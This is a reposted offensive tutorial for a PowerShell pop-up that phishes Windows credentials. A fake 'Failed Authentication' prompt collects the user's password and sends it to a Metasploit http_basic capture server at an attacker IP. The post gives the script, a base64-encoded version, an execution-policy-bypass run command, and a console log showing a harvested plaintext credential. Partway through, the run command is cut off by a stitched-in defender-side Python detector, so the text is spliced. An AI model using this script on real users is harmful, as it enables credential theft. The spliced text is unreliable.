Reposted

[Combo] PowerShell pop-up + Capture module

Metasploit Minute has entered its third season. Next we will use Metasploit's Capture module to collect credentials from this PowerShell pop-up. No admin rights needed, no UAC bypass needed, just SSL.

Here is the code:

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username,$cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('https://172.16.102.163');

Let's break it down line by line.

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);

This pops up a credential prompt titled "Failed Authentication" with nothing else shown (the default settings); the box is pre-filled with the user name and domain name to make it look more genuine.

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};

Tells PowerShell not to validate SSL certificates (so that we can later serve HTTPS with a self-signed certificate).

$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");

Creates a new WebClient object and sets its User-Agent to look like wget.

$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;

Tells PowerShell to go through whatever proxy the current user is configured with, using the user's default network credentials for it; if there is no proxy, this is simply ignored.

$wc.credentials = new-object system.net.networkcredential($cred.username,$cred.getnetworkcredential().password, '');

Tells PowerShell to use whatever the user just typed into the pop-up as the credentials for HTTP authentication.

$result = $wc.downloadstring('https://172.16.102.163');

Finally, we use the capture module in Metasploit. First, encode the script as PowerShell expects (UTF-16LE, then base64):

cat power.txt | iconv --to-code UTF-16LE | base64

JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA=

Then run it:

powershell -ep bypass -enc      
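From the defender's side, the encoding step above is also what makes this command line easy to unwrap in process-creation telemetry: the -EncodedCommand argument is base64 over UTF-16LE, so a collector can decode it and look for the pieces this walkthrough makes visible (the credential prompt, the disabled certificate check, the typed password being reused as HTTP credentials, and the outbound request). The following Python is an added example, not code from the original post or from Metasploit; the log lines, the abbreviated script fixture and the IP address in it are constructed, and the indicator names are this example's own.

```python
"""Decode PowerShell -EncodedCommand payloads from process-creation log lines
and flag the indicators of the credential-prompt technique described above.

Added, defender-side example: not part of the original post and not from
Metasploit. All log lines below are constructed fixtures.
"""
import base64
import binascii
import re
from typing import Optional

# Patterns matched against the *decoded* script. Each one corresponds to a
# line of the walkthrough: the credential prompt, the disabled TLS
# certificate check, the reuse of the typed password as HTTP credentials,
# and the outbound request that carries them.
SCRIPT_INDICATORS = {
    "credential_prompt": re.compile(r"promptforcredential", re.I),
    "tls_validation_disabled": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "typed_password_reused": re.compile(r"getnetworkcredential\(\)\.password", re.I),
    "outbound_request": re.compile(
        r"downloadstring|downloaddata|uploadstring|invoke-webrequest|invoke-restmethod", re.I),
}


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the base64 argument of -EncodedCommand, or None.

    powershell.exe accepts any unambiguous prefix of the switch name, so
    "-e", "-ec", "-enc" and "-EncodedCommand" all count, while "-ep"
    (a prefix of -ExecutionPolicy) does not.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        low = tok.lower()
        if low.startswith("-e") and "-encodedcommand".startswith(low):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str) -> Optional[str]:
    """Base64-decode, then UTF-16LE-decode (how -EncodedCommand is built).

    Returns None when the argument is not valid base64 or not UTF-16LE text
    instead of raising, so a scanner can keep going over a whole log file.
    """
    try:
        raw = base64.b64decode(b64, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def scan_command_line(cmdline: str) -> dict:
    """Decode an encoded command (if any) and report the matched indicators."""
    findings = []
    if re.search(r"-e(?:p|x\w*)\s+bypass", cmdline, re.I):
        findings.append("execution_policy_bypass")
    b64 = extract_encoded_command(cmdline)
    if b64 is not None:
        findings.append("encoded_command")
    script = decode_encoded_command(b64) if b64 else None
    if script:
        for name, pattern in SCRIPT_INDICATORS.items():
            if pattern.search(script):
                findings.append(name)
    # Prompt + reuse of the typed password + outbound request together are
    # the technique itself; the other findings only raise the score.
    technique = {"credential_prompt", "typed_password_reused",
                 "outbound_request"} <= set(findings)
    return {"encoded": b64 is not None, "script": script,
            "findings": findings, "credential_prompt_phish": technique}


def _encode(script: str) -> str:
    """Build an -EncodedCommand argument the way the iconv/base64 step does."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed fixtures (not real telemetry): an abbreviated version of the
# script above with a documentation-range address, a benign encoded command,
# a plain command line, and an argument that is base64 but not UTF-16LE.
PHISH_SCRIPT = (
    "$cred = $host.ui.PromptForCredential('Failed Authentication','','','');"
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
    "$wc = New-Object Net.WebClient;"
    "$wc.Credentials = New-Object System.Net.NetworkCredential("
    "$cred.UserName, $cred.GetNetworkCredential().Password, '');"
    "$r = $wc.DownloadString('https://198.51.100.7/');"
)
SAMPLE_LOG = [
    "powershell -ep bypass -enc " + _encode(PHISH_SCRIPT),
    "powershell.exe -NoProfile -EncodedCommand " + _encode("Get-Date | Out-File C:\\temp\\d.txt"),
    "powershell.exe -File C:\\scripts\\inventory.ps1",
    "powershell -e YWJj",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        result = scan_command_line(line)
        print(result["credential_prompt_phish"], result["findings"], line[:60])
```

The switch-prefix check is what keeps `-ep bypass` from being mistaken for an encoded command, and the decoder returns None instead of raising so one malformed argument does not stop a scan of a whole day of logs; the three-indicator rule is deliberately narrower than "any encoded PowerShell" so that routine encoded administrative commands, like the Get-Date fixture, are reported but not flagged as this technique.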

You should then see a screenshot like this:

[Image: PowerShell pop-up + Capture module]

root@wpad:~/metasploit-framework# ./msfconsole -Lq
msf > use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) > show options

Module options (auxiliary/server/capture/http_basic):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   REALM        Secure Site      yes       The authentication realm you'd like to present.
   RedirectURL                   no        The page to redirect users to after they enter basic auth creds
   SRVHOST      0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT      80               yes       The local port to listen on.
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion   SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                       no        The URI to use for this exploit (default is random)

msf auxiliary(http_basic) > set SSL true
SSL => true
msf auxiliary(http_basic) > set SRVPORT 443
SRVPORT => 443
msf auxiliary(http_basic) > set URIPATH /
URIPATH => /
msf auxiliary(http_basic) > run
[*] Auxiliary module execution completed
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:443...
[*] Using URL: https://0.0.0.0:443/
[*] Local IP: https://172.16.102.163:443/
[*] Server started.
[*] 172.16.102.140   http_basic - Sending 401 to client 172.16.102.140
[+] 172.16.102.140 - Credential collected: "SITTINGDUCK/user:ASDqwe123" => /

Game Over

This article is easier to follow alongside the video.

Finally, the links:

https://www.youtube.com/watch?v=H_E3FNF8rBw

Link: http://pan.baidu.com/s/1eQvkw6Y  Password: mysb [low-bandwidth mirror, the video quality is not great]

[via the @91RI.ORG team]
